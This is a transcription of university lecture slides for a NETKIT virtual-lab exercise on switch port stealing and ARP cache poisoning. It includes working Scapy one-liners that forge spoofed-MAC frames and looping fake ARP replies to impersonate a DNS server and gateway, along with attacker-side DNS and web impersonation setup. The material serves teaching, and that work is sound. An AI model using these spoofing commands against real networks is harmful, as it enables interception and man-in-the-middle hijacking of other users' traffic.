Port stealing and ARP poisoning attack simulation with NETKIT

Transcription

1 Port stealing and ARP poisoning attack simulation with NETKIT Marco Bonola, Lorenzo Bracciale Corso di Reti di Accesso Tor Vergata Prof. Stefano Salsano A.A

2 Part 1 Port stealing

3 Outline GOAL 1: port stealing attack How do we get there? d bridge emulation with Linux bridge-utilities 2. Switched LAN emulation with NETKIT 3. L2 and L3 packet forging with Python and SCAPY

4 Bridge Utilities Linux bridge-utlities is a program that implements a subset of the ANSI/IEEE 802.1d standard (Media Access Control (MAC) Bridges). By using this tool a Linux station can be transformed in a real switch/bridge as defined in the standard and therefore real (and virtual) interfaces can be bridged together. bridge-utilities also implements STP (Spanning Tree Protocol). Bridge-utilities consists in a Kernel module (networking -> 802.1d Ethernet Bridging) and a user space application (brctl). Debian-like package installation: $ apt-get install bridge-utils

5 How to turn a PC into a switch br0 PC 3 ports SWITCH eth0 eth1 eth2... ethn A virtual interface br0 is created and a subset of the real network interfaces can be interconnected to this virtual interface as they where the actual port of a Ethernet switch. All the 802.1d operations are performed in the OS Kernel.

6 Basic commands Creating/destroyng a bridge device: $ brctl addbr "bridge_name $ brctl delbr "bridge_name Note: Don't set the IP address, and don't let the startup scripts run DHCP on the Ethernet interfaces either. The IP address needs to be set after the bridge has been configured. Adding/deleting interface to a bridge device: $ brctl addif bridge_name device_name $ brctl delif bridge_name device_name Showing devices in a bridge: $ brctl show Showing the forwarding DB: $ brctl showmacs bridge_name Important! Remember to bring the bridge interface UP when all interfaces have been added

7 NETKIT switch emulation vm2 vm3 vm1 eth0 eth0 vmn eth0 eth0 Collision Domain A Collision Domain B Collision Domain N PC2 PC3.. eth1 eth2 eth n Bridged into br0 PC1 HUB PCn VM with BRCTL SWITCH

8 NETKIT lab set-up Iface: eth :00:00:00:00:02 Collision Domain B pc2 iface: eth :00:00:00:00:01 Collision Domain A iface: eth :00:00:00:00:03 Collision Domain C pc1 SWITCH sw1 pc3

9 Lab set-up commands Set root password on the host machine: knoppix:$ su knoppix:# passwd (Enter New Unix Password) knoppix:# exit Start the virtual machines: knoppix:$ vstart pc1 --eth0=a knoppix:$ vstart pc2 --eth0=b knoppix:$ vstart pc3 --eth0=c knoppix:$ vstart sw1 --eth1=a --eth2=b --eth3=c

10 Lab set-up commands Network set-up on virtual machines: pc1: pc1:$ ip link set eth0 up pc1:$ ip link set eth0 address 00:00:00:00:00:01 pc1:$ ip address add /24 dev eth0 pc2: pc2:$ ip link set eth0 up pc2:$ ip link set eth0 address 00:00:00:00:00:02 pc2:$ ip address add /24 dev eth0 pc3: pc3:$ ip link set eth0 up pc3:$ ip link set eth0 address 00:00:00:00:00:03 pc3:$ ip address add /24 dev eth0

11 Lab set-up commands Preliminary set-up on the switch machine sw1: sw1:$ ip link set eth1 up sw1:$ ip link set eth2 up sw1:$ ip link set eth3 up sw1:$ nohup tcpdump -i any -w /hosthome/dump.pcap -s0 & Bridge creation on sw1: sw1:$ brctl addbr br0 sw1:$ brctl addif br0 eth1 sw1:$ brctl addif br0 eth2 sw1:$ brctl addif br0 eth3 sw1:$ ip link set br0 up Launch wireshark on the host machine: knoppix:$ wireshark /home/knoppix/dump.pcap

12 Proof of concept Monitor the forwarding database: sw1:$ watch brctl showmacs br0 grep v yes Let s populate the FDB: pc1:$ ping pc2:$ ping What is on the FDB? port no mac addr is local? ageing time 1 00:00:00:00:00:01 yes :00:00:00:00:02 yes :00:00:00:00:03 yes 1.00 Question: why all stations in the FDB whit only 2 pings?

13 Port stealing attack How to perform it Let s say an attacker (evil0, behind switch port 1) wants to steal pc2 (the victim) port on the switch (port 2). SW1 has to be tricked into thinking that pc2 is behind the same switch port as evil0 (port 1) To do that we evil0 has to send a Ethernet packet with bb:00:00:00:00:02 as source MAC address We say that evil0 has to spoof the victim s MAC address, or in other words to forge an Ethernet packet with spoofed source MAC address evil0 has to send whatever packet (ARP, raw IP, ICMP, empty UDP/TCP, DNS, etc..) with spoofed source MAC address and the switch will update the FDB properly

14 Port stealing: attack scenario iface: eth :00:00:00:00:FF victim Iface: eth :00:00:00:00:02 Collision Domain B Collision Domain A evil0 iface: eth :00:00:00:00:01 HUB pc2 iface: eth :00:00:00:00:03 Collision Domain C pc1 SWITCH sw1 pc3

15 Packet forging Writing tools for packets forging to the Ethernet layer is not as easy as sending data with TCP/UDP standard sockets. To do that we would need to use C raw socket API and write packets field by field (e.g.: eth.src, eth.type, ip.checksum ecc ) We have two different type of raw socket: PF_INET PF_PACKET For those who are interested, take a look at the following brief tutorial about C RAW socket programming:

16 RAW Server Receiving Ethernet frames not addressed to your machine is not trivial MAC implementations silently discard frames addressed to other MAC address (except for multicast Ethernet address) To work around this design limitation we can configure the NIC into promiscuous mode (i.e. to not perform any mac-based filtering at firmware level) Anyway OS Kernel usually filters these packets. To overcome this limitation, we need to open RAW socket. Such sockets short-circuit the application level with the Ethernet level, delivering to your application all the traffic your NIC sees. All further non-ethernet processing is up to your application

17 SCAPY Fortunately someone did this job for us and provided a python library for packet forging scripting. Python is a interpreted and object oriented programming language. SCAPY is a python library that provide (among other things) an interactive shell for packet forging (from L2 to L7). Moreover SCAPY interactive shell provide command for packet transmission, reception and decoding. (this is a simplified view of SCAPY limited to what we are interested in. For a detailed description take a look at:

18 SCAPY example Build a packet layer by layer, send it and wait for the reply: pc:$ sudo scapy >>> a=ip(dst=" id=0x42) >>> a.ttl=12 >>> b=tcp(dport=80, flags= S ) >>> sr1(a/b) What is needed but not specified is automatically done by scapy: 1. ip.src is set by default routing 2. tcp.sport is random 3. a DNS request is automatically sent to resolve 4. all other unspecified fields are set by scapy Just take a look at the C code to see the difference

19 Attacker set-up Start the virtual machine (on host machine): knoppix:$ vstart evil0 --eth0=tap, , eth1=a -M 64 DNS configuration : evil0:$ echo namserver > /etc/resolv.conf Install scapy package: evil0:$ apt-get update evil0:$ apt-get install python-scapy evil0:$ ip link set eth0 down Network set-up: evil0:$ ip link set eth1 up evil0:$ ip link set address 00:00:00:00:00:04 dev eth1 evil0:$ ip address add /24 dev eth1

20 Packet forging and transmission evil0:$ scapy >>> pck = Ether(src= 00:00:00:00:00:02 ) / IP(dst= ) / ICMP() >>> sendp(pck) ETHERNET IP ICMP src: 00:00:00:00:00:02 dst: 00:00:00:00:00:03 type: 0x0800 src: dst: proto: 01 (ICMP) echo request seq: 01

21 Summary 1. What can the victim do to prevent this attack? 2. Why is this attack more theoretical then practical? 3. How the victim can take the switch port back? 4. What can the attacker do to give the port back to the victim? 5. Is there another way to do this attack?

22 Part 2 ARP poisoning

23 Outline 1. NETKIT LAB Setup 2. HTTP connection (from L2 to L7) 3. ARP and Linux 4. ARP poisoning attack 5. Attacker configuration and setup

24 NETKIT LAB Download lab tarball from: stud.netgroup.uniroma2.it/~lorenzo/ra/ra-arp-lab.tar.bz2 temp url: tinyurl.com/esercitazione2 Preliminary operations: knoppix:$ tar xvjf ra-arp-lab.tar.bz2 knoppix:$ cd arp_poisoning/patch knoppix:$ sudo dkpg i patch_2.6-2_i386.deb knoppix:$./apply.sh The LAB is made with LSTART netkit command. For any details man lstart For each folder a vm is started with the same name See lab.conf for network configuration Each machine in the lab starts at startup the script machine.startup Each file in the folder machine/ is overwritten in the filesystem To start the LAB: knoppix:$ arp_poisoning/start_lab

25 NETKIT lab set-up dns Iface:eth evil0 Iface:eth Iface:eth0 DHCP conf. Collision Domain A Iface:eth0 DHCP conf. Iface:eth router Iface:eth DHCP server Iface:tap Knoppix Iface:eth0 DHCP victim UML ( virtual world ) Knoppix Live pc1

26 LAB Setup Lab.conf: router[0]=tap, , router[1]=a dns[0]=a victim[0]=a pc1[0]=a evil0[0]=a evil0[mem]=64 start_lab: #!/bin/bash lstart router pc1 victim evil0 dns

27 router start-up and configuration router.startup: ip link set eth1 up ip link set address 00:00:00:00:00:01 dev eth1 ip address add /24 dev eth1 /etc/init.d/dhcp3-server start echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s /24 -j MASQUERADE router/etc/dhcp3/dhcpd.conf: option domain-name-servers ; option routers ; default-lease-time 3600; subnet netmask { range ; }

28 dns startup and configuration dns.startup: ip link set eth0 up ip link set address 00:00:00:00:00:02 dev eth0 ip address add /24 dev eth0 ip route add default via /etc/init.d/dnsmasq start Dnsmasq configuration: See dns/etc/dnsmasq.conf and resolv.conf

29 pc1 and victim start-up pc1.startup: dhclient eth0 ip link set address 00:00:00:00:00:10 dev eth0 victim.startup: dhclient eth0 ip link set address 00:00:00:00:00:aa dev eth0 Q: why don t we set the default GW route as for the VMs in lesson 1? Q: what is the difference between this LAN and the one in Lesson 1?

30 What happens when a web browser connects? DNS Hypothesis : ARP and DNS cache empty Client 1. Who is DNS (ARP) 2. Server name resolution (DNS) 3. Who is default GW? (ARP) 4. HTTP get trasmission (HTTP) Router LAN

31 What happens when a web browser connects? Let s try it on pc1: 1. Run tcpdump: pc1:$ nohup tcpdump i eth0 w /hosthome/dump.pcap s0 & 2. Open a web page: pc1:$ links 3. Open wireshark in knoppix: knoppix:$ wireshark /home/knoppix/dump.pcap

32 ARP management in Linux The ARP cache can be is maipulated whit the command ip neighbour. HINT: no need to type neighbour. Try ip n Run man ip for details. 1. Show the cache: pc1:$ ip n show 2. Add a ARP entry: pc1:$ ip n add to ip_addr lladdr mac_addr dev dev_name state state_name (state: permanent, stale, noarp, rachable) 3. Delete a ARP entry: knoppix:$ ip n del to ip_addr dev dev_name 4. Flush the cache: pc1:$ ip n flush dev dev_name state state_name

33 Attack outline Attack GOAL: 1. ARP poisoning attack for DNS server impersonification 2. Wrong DNS resolution for some websites 3. HTTP request serving How do we get there? 1. Network emulation - NETKIT 2. ARP packet forging - SCAPY 3. DNS server impersonification Dnsmasq 4. WEB server impersonification Apache2

34 Attack scenario DNS LAN /24 INTERNET evil0 Spoofed ARP resp. Router DHCP server victim 1a ARP cache poisoning evil0 to victim: I am your DNS server

35 Attack scenario DNS LAN /24 INTERNET evil0 DSN Req/Resp Router DHCP server victim 2a DSN impersonification victim: who is evil0: I m

36 Attack scenario DNS LAN /24 INTERNET evil0 HTTP Router DHCP server victim 3a WEB server impersonification evil0 starts serving HTTP request for

37 Evil0 start-up (part 1) evil0.startup: echo "configuring eth0 interface" ip link set eth0 up ip link set address 00:00:00:00:00:ff dev eth0 ip address add /24 dev eth0 ip route add default via echo "configuring alias and hide it" ip address add /24 dev eth0 ip route add default via arptables -F arptables -A INPUT -d j DROP arptables -A OUTPUT -s j mangle --mangle-ip-s iptables -A OUTPUT -p icmp -s j DROP iptables -A INPUT -p icmp -d j DROP

38 Evil0 start-up (part 2) evil0.startup: /etc/init.d/dnsmasq start /etc/init.d/apache2 start echo "setting DNS nameserver" echo "nameserver " >> /etc/resolv.conf echo "installing scapy" dpkg -i /root/python-support_1.0.6_all.deb dpkg -i /root/python-scapy_ _all.deb

39 Evil0 configuration For DNS configuration see: evil0/etc/dnsmasq.conf evil0/etc/hosts In particular /etc/hosts: WEB data goes into /evil0/var/www/

40 ARP poisoning with SCAPY GOAL: evil0 wants to poison victim s ARP cache and steal DNS s IP address victim - IP: ; L2: 00:00:00:00:00:AA DNS server - IP: evil0 - L2: 00:00:00:00:00:FF evil0:$ scapy >> ips=" " >> ipd=" " >> hs="00:00:00:00:00:ff" >> hd="00:00:00:00:00:aa" >> a=ether(src=hs,dst=hd) >> b=arp(op=2,psrc=ips,pdst=ipd,hwdst=hd,hwsrc=hs) >> p=a/b >> sendp(p,loop=1,inter=1)

41 What s going on? 1. Watch ARP cache victim:$ watch ip n 2. Resolve a name: victim:$ host 3. Open the browser victim:$ links victim:$ links Q: Is there anything we can do? A: ARP and DNS static entry ( ip n add and /etc/hosts file )

42 MIM Attack scenario DNS evil0 Spoofed ARP resp. LAN /24 Router DHCP server INTERNET victim 1b ARP cache poisoning evil0 to victim: I am your default GW evil0 to GW: I am victim (not strictly necessary - NAT)

43 MIM Attack scenario DNS LAN /24 INTERNET evil0 Router DHCP server victim 2b Router impersonification - MIM victim s default GW = evil0 All traffic to outside the LAN is routed through the attacker evil0